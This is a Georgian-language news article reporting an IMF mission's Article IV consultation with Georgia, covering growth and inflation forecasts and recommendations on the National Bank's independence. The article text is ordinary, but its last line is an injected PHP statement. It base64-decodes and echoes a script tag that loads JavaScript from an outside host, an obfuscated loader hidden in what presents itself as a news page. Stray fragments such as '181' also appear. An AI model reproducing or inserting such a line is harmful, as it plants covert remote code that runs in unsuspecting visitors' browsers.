celsiusi
ავერსი შნაიდერი

საერთაშორისო სავალუტო ფონდის მისიამ, მეთიუ გერთნერის მეთაურობით, საქართველოსთან „მეოთხე მუხლით“ გათვალისწინებული კონსულტაციები წარმართა.

მისიამ საქართველოს ეკონომიკის შეფასება დაასრულა და საკუთარი პროგნოზები და რეკომენდაციები გამოაქვეყნა. როგორც IMF-ის განცხადებაში წერია, პრიორიტეტად რჩება სახელმწიფო საწარმოთა რეფორმა, ეროვნული ბანკის დამოუკიდებლობის გაძლიერება და განათლების, ინფრასტრუქტურისა და მმართველობის გაუმჯობესება.

„საქართველოს ეკონომიკამ მედგრად გაუძლო მრავალ შოკს, „კოვიდ 19“-ის პანდემიიდან დაწყებული. გაზრდილმა ტურიზმმა, სატრანზიტო ვაჭრობამ, უკრაინაში რუსეთის ომით გამოწვეულმა მოვლენებმა და ხელისუფლების დროულმა რეაგირებამ საქართველოს ეკონომიკაზე პოზიტიური გავლენა იქონია. სამომავლოდ, გლობალური გარემოს გაურკვევლობა, სავარაუდოდ, შენარჩუნება მიმდინარე კონფლიქტებისა და გეოეკონომიკური ცვლილებების გამო. საქართველომ შოკებისადმი მედეგობა კვლავ უნდა გააძლიეროს გონივრული მაკროეკონომიკური პოლიტიკის შენარჩუნებით და ზრდის პოტენციალის გაძლიერებით, გრძელვადიანი სტრუქტურული გამოწვევების გადაჭრითა და ახალი ეკონომიკური შესაძლებლობების გამოყენებით. პრიორიტეტად რჩება სახელმწიფო საწარმოთა რეფორმა, რაც მათგან მომდინარე ფისკალურ რისკებს შეზღუდავს და გაზრდის სახელმწიფო საწარმოთა ეფექტურობას. ეროვნული ბანკის დამოუკიდებლობის გაძლიერება და განათლების, ინფრასტრუქტურისა და მმართველობის გაუმჯობესება პროდუქტიულობის ამაღლებისა და ფესვგადგმული მაღალი უმუშევრობისა და ეკონომიკური უთანასწორობის აღმოსაფხვრელად“, – წერია IMF-ის მიერ გამოქვეყნებულ ინფორმაციაში.

ამასთან, როგორც საერთაშორისო სავალუტო ფონდში აცხადებენ, 2023 წელს საქართველოს ეკონომიკის ზრდის 7.5%-იანი ტემპი, ქვეყნის ზრდის ტრენდის მაჩვენებელს აღემატებოდა. ზრდას ხელს უწყობდა ტურიზმი, ვაჭრობა, მშენებლობა, და ფინანსური მომსახურება, ასევე მაღალი ინვესტიციები. 2024 წელს კი მოსალოდნელია ზრდის ტემპის კლება წლიურ 5.7%-მდე. ამასთან, ანგარიშში საუბარია ინფლაციის მაჩვენებლებზეც, რომლის მიხედვითაც, მიმდინარე წელს საქართველოში ინფლაცია მიზნობრივ, სამპროცენტიან მაჩვენებლის ფარგლებში იქნება.

„ბოლოდროინდელი ვითარება, პერსპექტივა და რისკები უკრაინაში ომით გამოწვეული ფინანსური ნაკადები მცირდება, მაგრამ ომის წინა პერიოდის მაჩვენებლებს კვლავ აღემატება. ისინი მაღალი ეკონომიკური მაჩვენებლების შენარჩუნებას უწყობენ ხელს. 2023 წელს ეკონომიკის ზრდის 7.5%-იანი ტემპი, ქვეყნის ზრდის ტრენდის მაჩვენებელს აღემატებოდა. ზრდას ხელს უწყობდა ტურიზმი, ვაჭრობა, მშენებლობა, და ფინანსური მომსახურება, ასევე მაღალი ინვესტიციები. 2024 წელს მოსალოდნელია ზრდის ტემპის კლება წლიურ 5.7%-მდე. მოხმარება, რასაც თავის მხრივ ხელს შეუწყობს ხელფასების ზრდა რეალურ გამოსახულებაში, ასევე, დასაქმების ზრდა, ეკონომიკის ზრდის მამოძრავებელი იქნება. საშუალოვადიან პერიოდში, ველით, რომ ეკონომიკის ზრდის ტემპი, თვის პოტენციურ მაჩვენებელს, წლიურ 5%-ს დაუახლოვდება. 2023 წელს ინფლაციამ მკვეთრად იკლო. გასული წელი 0.4% წლიური ინფლაციის მაჩვენებლით დასრულდა. ამ გარემოებას ხელი შეუწყო ადგილობრივი ვალუტის, ლარის სიძლიერემ, დაბალმა სამომხმარებლო ფასებმა და მკაცრმა მონეტარულმა პოლიტიკამ. საპასუხოდ, ეროვნულმა ბანკმა მონეტარული პოლიტიკის განაკვეთი 275 საბაზისო პუნქტით დასწია 2023 წლის მაისიდან მოყოლებული და ამა წლის მარტში, 8.25%-ის დონეზე განსაზღვრა. 2024 წლის ბოლოსთვის ინფლაცია 4%-ს მიაღწევს: წინა წელს დაფიქსირებულ პოზიტიურ საგარეო შოკებს ინფლაციაზე გავლენა აღარ ექნება და მონეტარული პოლიტიკაც ნაკლებად მკაცრი იქნება. საშუალოვადიან პერიოდში ინფლაცია თავის საპროგნოზო მაჩვენებელს დაუბრუნდება“, – აცხადებენ სავალუტო ფონდში.

ამასთან, IMF-ის რეკომენდაციაა, რომ ეროვნული ბანკის მმართველობისა და დამოუკიდებლობის გაძლიერება მოხდეს, რაც აუცილებელია მონეტარული პოლიტიკის სანდოობისთვის.

„ამასთან დაკავშირებით, სებ-ის კანონში უნდა შეტანილი იქნეს შემდეგი ცვლილებები: 1) უზრუნველყოფილი იყოს ეროვნული ბანკის სამეთვალყურეო საბჭოში არააღმასრულებელი წევრების უმრავლესობა;

2) დაზუსტდეს და განმტკიცდეს ადგილმონაცვლეობითი წესი; ასევე საბჭოს წევრების კვალიფიკაციის კრიტერიუმები;

3) მართვის არსებული საპრეზიდენტო მოდელი შეიცვალოს კოლეგიალურ გადაწყვეტილებებზე დაფუძნებული მართვის მოდელით“, – წერია IMF-ის მიერ გამოქვეყნებულ ანგარიშში.

181
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");